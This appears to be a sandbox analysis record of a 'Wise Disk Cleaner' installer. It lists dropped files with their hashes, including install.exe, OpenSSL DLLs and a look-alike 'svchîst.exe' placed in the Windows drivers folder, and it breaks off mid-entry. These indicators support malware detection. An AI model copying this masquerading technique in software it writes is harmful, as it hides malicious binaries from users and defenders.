MD5 a22b08040d741fb41fc5812996ad3e8f
SHA1 cc684e1c8d24aabeb0eab2763655d3050389c953
SHA256 d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c
SHA512 a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e

memory/620-70-0x0000000000000000-mapping.dmp

memory/644-71-0x0000000000000000-mapping.dmp

memory/1036-74-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp

MD5 2542d7026b9bbf47242cc3bae8e889e7
SHA1 4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d
SHA256 71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf
SHA512 be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb

memory/1092-73-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp

MD5 2542d7026b9bbf47242cc3bae8e889e7
SHA1 4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d
SHA256 71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf
SHA512 be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb

memory/676-68-0x0000000000400000-0x0000000000438000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe

MD5 a22b08040d741fb41fc5812996ad3e8f
SHA1 cc684e1c8d24aabeb0eab2763655d3050389c953
SHA256 d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c
SHA512 a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e

memory/676-64-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe

MD5 a22b08040d741fb41fc5812996ad3e8f
SHA1 cc684e1c8d24aabeb0eab2763655d3050389c953
SHA256 d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c
SHA512 a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e

\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe

MD5 a22b08040d741fb41fc5812996ad3e8f
SHA1 cc684e1c8d24aabeb0eab2763655d3050389c953
SHA256 d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c
SHA512 a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e

\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe

MD5 a22b08040d741fb41fc5812996ad3e8f
SHA1 cc684e1c8d24aabeb0eab2763655d3050389c953
SHA256 d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c
SHA512 a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e

memory/280-59-0x0000000000000000-mapping.dmp

memory/1196-56-0x0000000000000000-mapping.dmp

memory/1312-55-0x0000000000000000-mapping.dmp

memory/1524-78-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

memory/1932-82-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

MD5 8708699d2c73bed30a0a08d80f96d6d7
SHA1 684cb9d317146553e8c5269c8afb1539565f4f78
SHA256 a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f
SHA512 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

memory/1788-91-0x0000000000000000-mapping.dmp

memory/1388-93-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp

MD5 2542d7026b9bbf47242cc3bae8e889e7
SHA1 4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d
SHA256 71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf
SHA512 be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb

memory/1660-96-0x0000000000000000-mapping.dmp

memory/1616-95-0x0000000000000000-mapping.dmp

memory/1036-94-0x0000000074921000-0x0000000074923000-memory.dmp

memory/1592-92-0x0000000000000000-mapping.dmp

\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe

MD5 e2921d7229412e500624c09645a5d222
SHA1 b1ce462f1a21b726f515150c5aede4b8c592c906
SHA256 ddbe20fca82bad3524f1940fbb5719560a19e61848f802232c4a3f282244b96c
SHA512 09bbf7bd9ae1ca3ae9389ac2a031bb14ef97aa9ae151ad4f3c689bc78fcc6cf511c52bddb870271365745c47c5199191d6803cade998af2c67269c54bea978a8

\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe

MD5 e2921d7229412e500624c09645a5d222
SHA1 b1ce462f1a21b726f515150c5aede4b8c592c906
SHA256 ddbe20fca82bad3524f1940fbb5719560a19e61848f802232c4a3f282244b96c
SHA512 09bbf7bd9ae1ca3ae9389ac2a031bb14ef97aa9ae151ad4f3c689bc78fcc6cf511c52bddb870271365745c47c5199191d6803cade998af2c67269c54bea978a8

memory/676-90-0x0000000000400000-0x0000000000438000-memory.dmp

memory/1620-89-0x0000000000000000-mapping.dmp

memory/1464-88-0x0000000000000000-mapping.dmp

memory/1560-87-0x0000000000000000-mapping.dmp

memory/1768-86-0x0000000000000000-mapping.dmp

\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

C:\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe

MD5 e6495a498dfa91672a383cb9459c9c5e
SHA1 d1d44a9ec6df8fc42008c13bcf18ca5f790a371e
SHA256 ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778
SHA512 7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a

memory/1128-102-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe

MD5 e6495a498dfa91672a383cb9459c9c5e
SHA1 d1d44a9ec6df8fc42008c13bcf18ca5f790a371e
SHA256 ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778
SHA512 7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a

\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe

MD5 e6495a498dfa91672a383cb9459c9c5e
SHA1 d1d44a9ec6df8fc42008c13bcf18ca5f790a371e
SHA256 ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778
SHA512 7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a

memory/1016-105-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll

MD5 b936056bd95fa2de3197f0267c07f529
SHA1 2cb2a37e5df9a9039995e0248058f0df361d7a90
SHA256 1ec6c0f9ac71693fc04e59855f4231d4348761b4a2eb1171916dee56b604ce89
SHA512 156ead7c66ae263457e4605f7970506f43af79e1ad15fbd0d76f6435f0bd9ec20591bb779132315a4ad422fb3484982ace37e8a4c73d1987a7a5030a4e3745a3

memory/1928-117-0x0000000000000000-mapping.dmp

memory/596-120-0x0000000000000000-mapping.dmp

memory/1388-122-0x0000000000000000-mapping.dmp

\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

memory/1924-121-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/1524-116-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll

MD5 dfa08af47fb6bbff6b92308bdce07fe8
SHA1 63078cb67be4bf2dda6cf0de7cfa204ba91441ca
SHA256 7c02eb0f0d7ffe0738649a3aff2c70d3196c9afba81efd56a3b85ca65ee8ffce
SHA512 07848b8cf0eeae17fc67cfb58b2ea009c1726d11256a1c23433dc05a73e703329bfb5d6cc686c8f1f3e2cefc14bc6a946a336d042f982ace23bd398ec1320967

C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll

MD5 dfa08af47fb6bbff6b92308bdce07fe8
SHA1 63078cb67be4bf2dda6cf0de7cfa204ba91441ca
SHA256 7c02eb0f0d7ffe0738649a3aff2c70d3196c9afba81efd56a3b85ca65ee8ffce
SHA512 07848b8cf0eeae17fc67cfb58b2ea009c1726d11256a1c23433dc05a73e703329bfb5d6cc686c8f1f3e2cefc14bc6a946a336d042f982ace23bd398ec1320967

\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll

MD5 b936056bd95fa2de3197f0267c07f529
SHA1 2cb2a37e5df9a9039995e0248058f0df361d7a90
SHA256 1ec6c0f9ac71693fc04e59855f4231d4348761b4a2eb1171916dee56b604ce89
SHA512 156ead7c66ae263457e4605f7970506f43af79e1ad15fbd0d76f6435f0bd9ec20591bb779132315a4ad422fb3484982ace37e8a4c73d1987a7a5030a4e3745a3

memory/824-107-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe

MD5 e2921d7229412e500624c09645a5d222
SHA1 b1ce462f1a21b726f515150c5aede4b8c592c906
SHA256 ddbe20fca82bad3524f1940fbb5719560a19e61848f802232c4a3f282244b96c
SHA512 09bbf7bd9ae1ca3ae9389ac2a031bb14ef97aa9ae151ad4f3c689bc78fcc6cf511c52bddb870271365745c47c5199191d6803cade998af2c67269c54bea978a8

memory/1844-106-0x0000000000000000-mapping.dmp

memory/280-104-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Greek.ini

MD5 6e449bd01c21478ec0c19bd25a8c3ee5
SHA1 2aeba60b7600ca9e71a5fdd04c06ba05f1010262
SHA256 5c891ead72b187252daf3de22075a9c0e7f967e3050aec97db6f019d59bec138
SHA512 b691de0ac4254a29a6dd87fdfa5973c4b8c11719304ed665d6db661df66d7a1693e15514477979e24eabcd48fe9287fe07a123da6a469ef5dad07cf43d531021

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\German.ini

MD5 12aa09156da6482c24a1b2d4b55d855c
SHA1 1c2dad1b7d7beeb65710da2efafe36688754000e
SHA256 2fd313688b2ad99a3a4be590b5b96f4932cdecf5211771b84f2d060b00a3893e
SHA512 0742e6ab784dc765dcd13f0551883bad341b254cb993a8a6016ffbd18846109bbb6f00611dfde797db8382e014805c6e2a8ac38c50c827054af9ac7447e511dd

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\French.ini

MD5 3ec80eda36af3cae27ad0bc179efe392
SHA1 42924e65a3b9bef333b9f546343cf30d6fe25d71
SHA256 0c05485c08fc6877eae77afa6d38623360c16aadf9b6ad0271079854b6d8b83e
SHA512 6f5a1c499adb8d8fd20b29293a8b91e942de6945df1df0185d7e2e71ed48ea917f38b785f206f0d6065b6ae4a5b85f38e8275315e86679d4def32f35d1351cb4

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Finnish.ini

MD5 dc73d7da4015500c369caacb8ef26e21
SHA1 c33246680111d1fc3fb3cdac10dd7c37f9f05a33
SHA256 d70edac364dd4273a80e40e5d3a710198576b1cfd81e3cec0bfb4d4683dd50fb
SHA512 0f4f0a50f3dd36999864669f078d686b5af04cfb750951c9abe2cdbb609c683e447fd56ac28a34d4a83e53444c12d13cc742bcc9bd3236ba6e363dfbcecbf3f8

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\English.ini

MD5 dfb897952f03b002a95ef8f47a98afe5
SHA1 cd9801955ea04a949175cbb8a3972488ef15e966
SHA256 86da3520698f44289c789b1d4771929edc36f5dd36c6ba54e1382a06a39c7684
SHA512 8536477f154d0687e0c6673b553a27c1f2ef2b38231162e31ab4039db0d772d5d652518f15ddddbf74f981345307eef175321ae262514b06506b18823e0dc5ba

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Dutch (Nederlands).ini

MD5 8e2dedf7ad4959dcba5aad9221755ac1
SHA1 1e47e115dc2fb5cc2e27d1ab2726b85409c8338b
SHA256 32f54c23c8760205d74885992cd8e11fd23911b44660078e1ee11e01af3f4106
SHA512 b932acbbd885fe68dc6ab31386bf3a9d6523ef7e3063c922cf77ac90ec147f7df1c087bcd067f8677abfb3b134f161035f7116c25ba544d93461e372f8e93a37

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Danish.ini

MD5 3ca37cef05d366f1e10a49a6dde3225a
SHA1 2734b737b07ffdcdf7bd410b29e3030c94482dfe
SHA256 0714b1684aa7d1cab8978138754bcf712b43162e45e48c74aab1d588907d2a46
SHA512 e7d1aad57bb919f192427afe3558dc1c4467d82378b742a82da40ef430db5b8aa41aaec562bbc71ef36731d0800b113e1e38e861f9967904e07f6d4a64a01974

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Czech.ini

MD5 a1800a0b75aaf75089172dce6d9cbcba
SHA1 6eb1245d876ebfd253c77df807acfae0b6c72eed
SHA256 10d4accda03a1fb836d02eaab186054b49acb1630edd0a07c8d2653234266b1d
SHA512 6262cd53a2993d985e2c440a45a872a43cc9de8df380bbbf861df3748243c3768f85adf4db6e18ba148cd2d0ae3c6eb7d77f822c8015364d94114141d605a917

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Traditional).ini

MD5 3b2fe60c4ace1c7733549c1e892622fa
SHA1 5903fa94e31186df51bf520add0542153c963a71
SHA256 c983c82379b6dc354f7dc4fb37e5ee147069c1141503df4a1efa22884969a69f
SHA512 ebf3e1ef1354916d9cd3f4ba7f9c2a175e6b9d162e4380a69f551926c132079494b67ff3defaace968659dde396cb3e0a191c4bdea9ac6dde7349c563c1756ab

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Simplified).ini

MD5 ddb1e3858ba84d18e832bf926f71b8d3
SHA1 ff7af2ab8f8a9b21895e260055df79b10b1e3da2
SHA256 ac03ab706d80d0175939940091df58543eb885a5cc939e7dfa72a12dfe0a680e
SHA512 b4b8da9b1b3b363e4e614a1ba52b926d785056011f2927febad29680df22225ded628141bff4b3bb9e9d11a77b88db5b44ef8955142ecb599f2891a09077fb23

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Catalan(Spain).ini

MD5 e06f62dcb6360c54d0c99e58f7108a1b
SHA1 60d47951f1cb0fff9abcccfdbd297337e5435130
SHA256 7efcb6193c689aab517532b3a7dde3fbce7e42c6060fb698844458aaeae6656b
SHA512 fa6d8726032afa24926e374d8496d73a61776cda53d735a980a87b1aaf2db160ec7a8243bf9e6c034d18218a2f1222d256f820c059c77647648456432682078e

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Bulgarian.ini

MD5 8db61046f722c6feddf6e9ff36395cb1
SHA1 32a99cfa048b1bdfa2a27d8618ebcbea98ef31ac
SHA256 65fedfe3cf7024a0345345e7973f67f0c6b8b0f548dcdca5c4f48c0b667d22e8
SHA512 a34408d86ad01faf8d7a5b651210943b4e8d5d3c4226eb4c082e5c7c346611015fa9139c3774d365df70d0d146a4a7c49fb1ff8ee04d668c3129d8c49a3bd207

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Latin).ini

MD5 09acc2789101dbef07ab7e1c6be7ace6
SHA1 7a55791699490fc7b23fb51fd1b5f0f322a05447
SHA256 2007a5a9dbac09656e761b04448e53dd094ec30355f6394204158648d89131d4
SHA512 ad5071fb49485dc2a8a7d1ab2f7471b90d403b733bce3bf5cffdf017915cf89c719a0d63b6c22d7fe934dcb3713c8748e1f9fcaf6891feeb53ddc2d7c51998e5

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Cyrillic).ini

MD5 538d04c6d3802d211d59fe34d24b08b2
SHA1 dd24233a739f0dc681b31d215006b407d4b10395
SHA256 fd915abe1e9c0deb8e103624eb5f0c4f29ad9506092214da36e4e9ea85add212
SHA512 6f759975e4f4c95145ab862190428dbf7cf8ab8e5e32379cc44cb9c1f63c7c87e8263033dced3f55d2ef7e61212f22d3892907f823f1e9029dbc7a776de70e31

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Arabic.ini

MD5 3e543da6bcc0ee84d53d88438fafc799
SHA1 c86b179b803d37852e73a6145c135431b4d52d74
SHA256 586419de24beb7faee4a142ee0b5b78c35ff9b7ae4e4a7cc50fb1e2bf082f98c
SHA512 3a3cedfdbc40e9a2458f1117d08e034881c4ff8ed090bdb2f40f095ee53ec7a4d23dc83fd3ce1fea5939fe43cf31419fcbff799a88ef078e60dae9b6035d0640

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Nynorsk).ini

MD5 d82a2f11ab17c1fdc94e8aca732bfdc6
SHA1 58347d500fa9efaf46b600345f9752f426e99b45
SHA256 6e9385096f433f4a4d95997d0483ab08695b6b7cf2c9f1f525cf41b83c85459c
SHA512 61f6ddad161a8e0df43b60e424fbd83e0d759f1bedfcfd5268c803f98d98ba4006b1c2f9f2b63b3a3461401fdbf16dec2cd07d8fac15af7eb61fd5b79a564343

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Bokmal).ini

MD5 5d95e5077b31764d3d91ace0ea64490f
SHA1 12bcc6fd0e6fa8c7109cc4cf19033a0c3cd8fadd
SHA256 73721487c7680b844e73079cc57acc6988622506230f73929c63ef197d19c83e
SHA512 f22e764a002e835a51fc4db17320c96241e949f6b437c1f699714e41ca759f096a99c61cc82b773198f962170322cadbd4a5f943550ad7b4355d48cf05915bcc

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Nepali.ini

MD5 8e9d6867bb1b047e0e7eecf8a7ab4151
SHA1 269c9258fed0552758c75897ed8346e7e8c4eb2b
SHA256 44c210cf753a79acba19b171fe4643056dee29d441ccf91fa6121b7e441cd2ea
SHA512 817e7016dd68f6402029c1f8fa49ac2edd8d114f06ac5a8c1b68b39e77279d6e68ec49a575da950e1c9d686488195bebb95d0997bf3123bfe54dfffcea689183

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Korean.ini

MD5 8f674280944a449f943689e19ad0ced2
SHA1 90c7d3972bb418eecb2696e2e7390df2c0a33a7d
SHA256 a2223c96dc9fced161469aa2989db97ba0e9393dc86cbdc7aa06d4342772a000
SHA512 6b788b826af729a2217d6b5d72bdaf4ab9682e6cd71331d1c5da4384fc25a4b4d9f2b44d776b65a8ade2d589ce55baa7e00f11a9d53a36fa79ce5943f843df65

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Japanese.ini

MD5 7792786223200e5da40d9c542a7f4b8b
SHA1 b71f45389d66dfb56303a81547aafcd3bfbe869a
SHA256 a62a2aaf6e39e46a9cb0053a670d09dcb4aaf9142f89a7b12daad1793154db9a
SHA512 2a3d66677eeeea065392d27546bc2fba5e115f906cd1dc4398dd848f104a9d5cf98d2dfec8daa432ad94ee6f93bd45d5f300c0c6801bbfadb073639b3f5f32e7

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Italian.ini

MD5 4b9f92249266356fea5844eccdc6e6f1
SHA1 0a060c8d39e98fbda3411b8b915a83754af54089
SHA256 1a2f241b503be86067d89a8fcb69bdffcccec96912a765337dfadcce6bca75b0
SHA512 8ab4323d596a71d1cbc9492b48eb6f6996ddd0411edd6732417b68dd27d1acb2f00c17865ce7a17dac58947dd7482771c11c8fc5c2b73561a47469641fe9a82a

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Indonesian.ini

MD5 0a763d65adccbe593039ccdcfde7b499
SHA1 833c56164a17b152d4098ee95fd4bb6912193a89
SHA256 759b0029fc140d49cb40bcd197fc64537fe408cd78641d0cecafac599aa97d10
SHA512 b83d88ce225621e0460d40c8c9ad92e91ffe1c0b3875270ff8ed8aa66a7b3a08c6605e6f4e7b7bf5d02b9ea2ab7256dff07f2bf31232d2675de869d06bfc9d7e

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hungarian.ini

MD5 b967b7a48eca3f5076033759089e4142
SHA1 9e29f54c07066608be1cb6abc59cf7cda823cc03
SHA256 1ecce57dbf90759fcfefbea163521dfb8d3281a98c216d94ec51771308cf32dd
SHA512 4a588f3150e21d1b7923fc885ab28f36a40488157f583de9558476d04a2ceb5fa3d0f91ba09d12aacee1a0a8d5797c4be6e15ba01e6a01427e1de88845bd04cb

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hebrew.ini

MD5 75009c9455e68643ac2e2301b8af20e2
SHA1 3091a33bb6517115b38f4eb3cad3747f3b64569c
SHA256 05746a60b31c255eaf1ea903c5ad47f3e25d98633472cee165acbec3521c64a8
SHA512 18619921ab3bcf481466960f1cab10b2185be93470ee9b6cd01377b523ea8810e6d159a4515a0cfa575df3617f47fc5cee7d5982cc2deff0fa8a69644e7a0eb8

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Spanish (Colombia).ini

MD5 ae51cebbeb929ca8ef00abdee0554352
SHA1 e245b0ece229b9d1a2109fb48e1533f0f7dcc490
SHA256 9cb9b5580e4706168c02b07f3ef6656ebd2f6d9661cccd75b089a465d5ac0565
SHA512 c617871237592bfe3bcd1ac4e3b41ef4157b0b6cbcb636fe0d56f8ea59c198fc4551b6b86f1497778f3c4db06fb8e89169e5ac0e9662532d4c6f0f0b944a3ea1

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovenian.ini

MD5 204fe6fcde25232628a4d7b34e6b87fd
SHA1 613efc64843467bd90ec64949367f2139f4b581e
SHA256 4940b086c467d2ee6fd232f787bf03382c8328f2ce71c7ca747c02a7a368c1de
SHA512 88af2f2bff0fb8daa60c048cef6008bafdb636970b30da4765cf6ee2f62604e1581a3ce822555a14d018a7f10d0d2da2e072d58b12be4f27200dcdf20890b726

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovak.ini

MD5 5108c5d28c126216a792f4a0900847fa
SHA1 9a8b3e565e37e1bf717d3e1c7ebca12e414328f5
SHA256 3860ad448ebd501be377fbd46c65cb4e7aecc809900d5f085ee5223931425695
SHA512 ce241b74f7903131fd0af070cc75a29d01e375e5d05636814fa123c1edfdb0304863f997fb3fcb3467bf87b770f8412acf67a29480b96877e8d4fd0888b39438

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Serbian.ini

MD5 d5de1a134aab351dcd5b8f22f32ec30a
SHA1 45404143905dcb284e99acd78285a3ba86a1c1a6
SHA256 2a2338c828fd426a6d50e4866ed1c59ccd292b877cf66374c57a8826b30c9aa1
SHA512 7727f4c9902daae600e48a950afd61ba2e26d8a943f20bbfc2ec7eaf01f1de2a8b9d04e4fd4ec9b38cf700c6df00d58c714f1208e60383755ad5220715912427

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Russian.ini

MD5 479bfcd4c6e0a91bce8eeb3d5282902a
SHA1 a73b34daca2a27e159a7f14148423bd0e8877287
SHA256 b326491b5a4245e9b3a436cfe1b023d88b35cdbbb50368bbac5f7d1f19560718
SHA512 8c799a763cae7bdd33ff8d9a3295b2b92f87413bdb46e590c02255aedbd32707faf5d5badfc884cddeeb8be4772c2f824d16af3996e5ecb0692a2399594121f0

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Romanian.ini

MD5 e56f223aea3e1d394c31b93f17054cb7
SHA1 9fe9ca1dc70cd7e0b2264842139a364ac4a8e689
SHA256 865b6284291dba5b148d236f0ebfd3aebf0998dabfe36cc3a013658af1733dcc
SHA512 21050172c652bbcc93ab409d16aaef330a713d8dcf33b5f84ea323832b3489bddcb98ec552d00e48afd894e1f935a0fdc22749ee018f8d46d407559a0137eeed

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Portugal).ini

MD5 66ccf14a92b6354bed01867615a76d90
SHA1 7f133285713146b2e343d44c0de190fac75e40f6
SHA256 a3af006e4957a14abd637e50cf265ecba049ca53ff716ec0298c96a0265a2f9e
SHA512 c43f521781d59a150a124d6105d295dbfb5ac6dee0401b9c927eeda8ba0a8df21d1e69fdf8dc090314f3945b97dc72a9cd3ba9aed34bbb8f9ae96fdcb96ca784

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Brasil).ini

MD5 3445d1277329541b11ddb2b1b5dc54f5
SHA1 57fac60be3e79eb01d4170df6abbb44dc62c21e6
SHA256 c34cf5c5773429d9c1273bdeebaf59fc0f7984db541f6524d2c1718c191aeed2
